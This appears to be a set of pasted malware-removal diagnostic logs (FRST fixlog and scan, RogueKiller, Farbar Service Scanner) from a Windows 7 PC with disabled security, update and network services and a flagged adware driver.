SERVICE_NAME: winmgmt
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 4   DISABLED
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k netsvcs
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Windows Management Instrumentation
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : localSystem

========= End of CMD: =========


========= sc queryex winmgmt =========


SERVICE_NAME: winmgmt
        TYPE               : 20  WIN32_SHARE_PROCESS  
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1077  (0x435)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 0
        FLAGS              :

========= End of CMD: =========


========= sc queryex rpcss =========


SERVICE_NAME: rpcss
        TYPE               : 20  WIN32_SHARE_PROCESS  
        STATE              : 4  RUNNING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 912
        FLAGS              :

========= End of CMD: =========


========= sc qc rpcss =========

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: rpcss
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k rpcss
        LOAD_ORDER_GROUP   : COM Infrastructure
        TAG                : 0
        DISPLAY_NAME       : Remote Procedure Call (RPC)
        DEPENDENCIES       : RpcEptMapper
                           : DcomLaunch
        SERVICE_START_NAME : NT AUTHORITY\NetworkService

========= End of CMD: =========


========= sc queryex RpcEptMapper =========


SERVICE_NAME: RpcEptMapper
        TYPE               : 20  WIN32_SHARE_PROCESS  
        STATE              : 4  RUNNING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 912
        FLAGS              :

========= End of CMD: =========


========= sc qc RpcEptMapper =========

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: RpcEptMapper
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k RPCSS
        LOAD_ORDER_GROUP   : COM Infrastructure
        TAG                : 0
        DISPLAY_NAME       : RPC Endpoint Mapper
        DEPENDENCIES       :
        SERVICE_START_NAME : NT AUTHORITY\NetworkService

========= End of CMD: =========


========= sc queryex DcomLaunch =========


SERVICE_NAME: DcomLaunch
        TYPE               : 20  WIN32_SHARE_PROCESS  
        STATE              : 4  RUNNING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 844
        FLAGS              :

========= End of CMD: =========


========= sc qc DcomLaunch =========

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: DcomLaunch
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k DcomLaunch
        LOAD_ORDER_GROUP   : COM Infrastructure
        TAG                : 0
        DISPLAY_NAME       : DCOM Server Process Launcher
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

========= End of CMD: =========


========= sc queryex bfe =========


SERVICE_NAME: bfe
        TYPE               : 20  WIN32_SHARE_PROCESS  
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1077  (0x435)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 0
        FLAGS              :

========= End of CMD: =========


========= sc qc bfe =========

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: bfe
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 4   DISABLED
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
        LOAD_ORDER_GROUP   : NetworkProvider
        TAG                : 0
        DISPLAY_NAME       : Base Filtering Engine
        DEPENDENCIES       : RpcSs
        SERVICE_START_NAME : NT AUTHORITY\LocalService

========= End of CMD: =========



The system needed a reboot.

==== End of Fixlog 19:52:23 ====

 

 

 

RogueKiller V12.12.9.0 (x64) [Mar 19 2018] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : https://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Martin [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Scan -- Date : 03/19/2018 19:58:30 (Duration : 00:28:38)
Switches : -refid

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 6 ¤¤¤
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | TCP Query User{C02949D8-6746-4BCF-956E-4B55C69F0F0C}C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe|Name=gameranger.exe|Desc=gameranger.exe|Defer=User| [7] -> Found
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | UDP Query User{70FBBFBB-B33D-4CC7-94F3-4A41468DFDC9}C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe|Name=gameranger.exe|Desc=gameranger.exe|Defer=User| [7] -> Found
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | TCP Query User{C02949D8-6746-4BCF-956E-4B55C69F0F0C}C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe|Name=gameranger.exe|Desc=gameranger.exe|Defer=User| [7] -> Found
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | UDP Query User{70FBBFBB-B33D-4CC7-94F3-4A41468DFDC9}C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe|Name=gameranger.exe|Desc=gameranger.exe|Defer=User| [7] -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found

¤¤¤ Tasks : 1 ¤¤¤
[Hj.Shortcut] \{8D7BD5CC-F762-4C88-83D1-6E0E6114373E} -- "c:\program files (x86)\mozilla firefox\firefox.exe" (http://ui.skype.com/ui/0/7.7.0.103/nl/abandoninstall?page=tsPlugin) -> Found

¤¤¤ Files : 1 ¤¤¤
[Root.Wajam][File] C:\Windows\System32\drivers\ddd6ebd91f4ecf7d7f74107288edb1a0.sys -> Found

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0:  +++++
--- User ---
[MBR] 49c75b6e74d82306bd948cabb7e68932
[BSP] b534b12d3a8c97cb62514c1a63434e15 : Windows Vista/7/8 MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 244096 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1:  +++++
--- User ---
[MBR] 57e59b910ab560f6a40c1550948d86a9
[BSP] d8232796e7a9b75e04c7f42f5b6b1192 : Windows Vista/7/8 MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 1907727 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

 

Farbar Service Scanner Version: 27-01-2016
Ran by Martin (administrator) on 19-03-2018 at 20:34:27
Running from "D:\User profile\Desktop"
Windows 7 Ultimate Service Pack 1 (X64)
Boot Mode: Normal
****************************************************************

Internet Services:
============
Dnscache Service is not running. Checking service configuration:
The start type of Dnscache service is set to Disabled. The default start type is Auto.
The ImagePath of Dnscache service is OK.
The ServiceDll of Dnscache service is OK.

Dhcp Service is not running. Checking service configuration:
The start type of Dhcp service is set to Disabled. The default start type is Auto.
The ImagePath of Dhcp service is OK.
The ServiceDll of Dhcp service is OK.

Nsi Service is not running. Checking service configuration:
The start type of Nsi service is set to Disabled. The default start type is Auto.
The ImagePath of Nsi service is OK.
The ServiceDll of Nsi service is OK.


Connection Status:
==============
Attempt to access Local Host IP returned error: Localhost is blocked: Other errors
LAN connected.
Attempt to access Google IP returned error. Other errors
Attempt to access Google.com returned error: Other errors
Attempt to access Yahoo.com returned error: Other errors


Windows Firewall:
=============
mpsdrv Service is not running. Checking service configuration:
The start type of mpsdrv service is OK.
The ImagePath of mpsdrv service is OK.

MpsSvc Service is not running. Checking service configuration:
The start type of MpsSvc service is set to Disabled. The default start type is Auto.
The ImagePath of MpsSvc service is OK.
The ServiceDll of MpsSvc service is OK.

bfe Service is not running. Checking service configuration:
The start type of bfe service is set to Disabled. The default start type is Auto.
The ImagePath of bfe service is OK.
The ServiceDll of bfe service is OK.


Firewall Disabled Policy:
==================


System Restore:
============
SDRSVC Service is not running. Checking service configuration:
The start type of SDRSVC service is set to Disabled. The default start type is 3.
The ImagePath of SDRSVC service is OK.
The ServiceDll of SDRSVC service is OK.

VSS Service is not running. Checking service configuration:
The start type of VSS service is set to Disabled. The default start type is 3.
The ImagePath of VSS service is OK.


System Restore Policy:
========================


Action Center:
============

wscsvc Service is not running. Checking service configuration:
The start type of wscsvc service is set to Disabled. The default start type is Auto.
The ImagePath of wscsvc service is OK.
The ServiceDll of wscsvc service is OK.

winmgmt Service is not running. Checking service configuration:
The start type of winmgmt service is set to Disabled. The default start type is Auto.
The ImagePath of winmgmt: "%systemroot%\system32\svchost.exe -k netsvcs".
The ServiceDll of winmgmt service is OK.


Windows Update:
============
wuauserv Service is not running. Checking service configuration:
The start type of wuauserv service is set to Disabled. The default start type is Auto.
The ImagePath of wuauserv service is OK.
The ServiceDll of wuauserv service is OK.

BITS Service is not running. Checking service configuration:
The start type of BITS service is set to Disabled. The default start type is Auto.
The ImagePath of BITS service is OK.
The ServiceDll of BITS service is OK.

EventSystem Service is not running. Checking service configuration:
The start type of EventSystem service is set to Disabled. The default start type is Auto.
The ImagePath of EventSystem service is OK.
The ServiceDll of EventSystem service is OK.


Windows Autoupdate Disabled Policy:
============================


Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
The start type of WinDefend service is set to Disabled. The default start type is Auto.
The ImagePath of WinDefend service is OK.
The ServiceDll of WinDefend service is OK.


Windows Defender Disabled Policy:
==========================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=DWORD:1


Other Services:
==============


File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcore.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\SDRSVC.dll => File is digitally signed
C:\Windows\System32\vssvc.exe => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed


**** End of log ****

 

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14.03.2018
Ran by Martin (administrator) on OVERLORD (19-03-2018 20:35:54)
Running from D:\User profile\Desktop
Loaded Profiles: Martin (Available Profiles: Martin)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
() C:\Windows\SysWOW64\PnkBstrB.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.7\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.7\GoogleCrashHandler64.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\..\Interfaces\{458E592A-DE20-42E8-8C67-65C88F2A797D}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617911&ResetID=131643942694512768&GUID=72AA9CAC-BF0C-4EEC-B561-2B576365F905
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://se.msn.com/?ocid=iehp
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2017-12-12] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre6\bin\ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2014-01-22] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2017-02-23] (Microsoft Corporation)
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} hxxp://download.eset.com/special/eos/OnlineScanner.cab
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2017-08-15] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: 9am9eglk.default
FF ProfilePath: C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default [2018-03-19]
FF Homepage: Mozilla\Firefox\Profiles\9am9eglk.default -> hxxps://www.malwarebytes.org/restorebrowser/
FF Extension: (Auto Refresh) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\autorefresh@plugin.xpi [2016-04-28] [Legacy]
FF Extension: (bug643770(Stop Autoscroll by mouse wheel)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\bug643770@alice0775.xpi [2016-04-28] [Legacy]
FF Extension: (Extra Padding When Maximized) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\extrapadding@digitaldj.net.xpi [2016-04-28] [Legacy]
FF Extension: (Paste and Go Hotkey (Keyboard Shortcut)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\FxExtPasteNGoHtk@github.lostdj.xpi [2016-04-27] [Legacy]
FF Extension: (Gif Delayer) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-mqCpKcAruymyAA@jetpack.xpi [2016-04-27] [Legacy]
FF Extension: (YouTube ALL HTML5) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-qj0w91o64N7Eeg@jetpack.xpi [2017-08-29] [Legacy]
FF Extension: ("Manage search engines" button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-XGhxOf1M8UPpsQ@jetpack.xpi [2017-09-12] [Legacy]
FF Extension: (No Close Buttons) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\no-close-buttons@xavamedia.nl.xpi [2016-11-02] [Legacy]
FF Extension: (Secure Login) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\secureLogin@blueimp.net.xpi [2017-02-25] [Legacy]
FF Extension: (Super Start) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\superstart@enjoyfreeware.org [2015-12-05] [Legacy]
FF Extension: (Tab Deque) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\tabdeque@sblask.xpi [2017-11-26]
FF Extension: (Tab Kit - Mouse Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\tabkit.mouse-gestures@pikachuexe.amateur.hk.xpi [2017-03-05] [Legacy]
FF Extension: (uBlock Origin) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\uBlock0@raymondhill.net.xpi [2018-01-15]
FF Extension: (Undo Closed Tabs Button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\undoclosedtabsbutton@supernova00.biz.xpi [2016-08-26] [Legacy]
FF Extension: (Zotero Connector) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\zotero@chnm.gmu.edu.xpi [2017-12-14]
FF Extension: (Zotero Word for Windows Integration) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\zoteroWinWordIntegration@zotero.org [2016-10-15] [Legacy]
FF Extension: (uBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{2b10c1c8-a11f-4bad-fe9c-1c11e82cac42}.xpi [2015-12-05] [Legacy]
FF Extension: (FT DeepDark) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{77d2ed30-4cd2-11e0-b8af-0800200c9a66} [2017-10-17] [Legacy]
FF Extension: (All-in-One Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{8b86149f-01fb-4842-9dd8-4d7eb02fd055} [2016-04-27] [Legacy]
FF Extension: (Single Key Tab Switch) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a66191d8-898b-4a66-89be-d5b279477a54}.xpi [2015-12-31] [Legacy]
FF Extension: (LeechBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a95d8332-e4b4-6e7f-98ac-20b733364387} [2017-11-15] [Legacy]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_28_0_0_161.dll [2018-02-06] ()
FF Plugin: @java.com/DTPlugin,version=1.6.0_45 -> C:\Windows\system32\npdeployJava1.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_28_0_0_161.dll [2018-02-06] ()
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2014-01-06] (Google, Inc.)
FF Plugin-x32: @live.heroesandgenerals.com/npretox -> D:\Spel\Heroes & Generals\live\npretox-1.0.6.1\npretoxlive-1.0.6.1.dll [2014-05-07] (Reto-Moto ApS)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-07-19] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
FF Plugin-x32: @mozilla.zeniko.ch/SumatraPDF_Browser_Plugin -> C:\Program Files (x86)\SumatraPDF\npPdfViewer.dll [2013-10-02] (Simon Bünzli)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-02-11] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1755371218-3412237994-1746218496-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Martin\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-12-27] (Unity Technologies ApS)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\secure_cert.js [2018-03-01]

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default [2018-03-19]
CHR Extension: (Slides) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-19]
CHR Extension: (Docs) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-19]
CHR Extension: (Google Drive) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-12]
CHR Extension: (YouTube) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Google Search) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-12]
CHR Extension: (Sheets) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-19]
CHR Extension: (Heroes & Generals) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbophcdhblbipoaacgchllkobdaolpge [2014-05-11]
CHR Extension: (Google Docs Offline) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-10-20]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-23]
CHR Extension: (Gmail) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-15]
CHR Extension: (Chrome Media Router) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-01-23]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S4 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [7013384 2018-02-08] ()
S4 DisplayFusionService; C:\Program Files (x86)\DisplayFusion\DisplayFusionService.exe [1375600 2013-11-27] (Binary Fortress Software)
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [399120 2017-02-13] (EasyAntiCheat Ltd)
S4 HiPatchService; D:\Spel\Tribes Ascend\HiPatchService.exe [9728 2017-07-12] (Hi-Rez Studios) [File not signed]
S4 HnGSteamService; D:\Spel\Steam Library\steamapps\common\Heroes & Generals\hngservice.exe [777000 2018-02-27] (Reto-Moto ApS)
S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6234056 2017-11-01] (Malwarebytes)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
S3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
S4 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 Origin Client Service; D:\Spel\Origin\OriginClientService.exe [2122248 2016-06-25] (Electronic Arts)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [66872 2013-11-11] ()
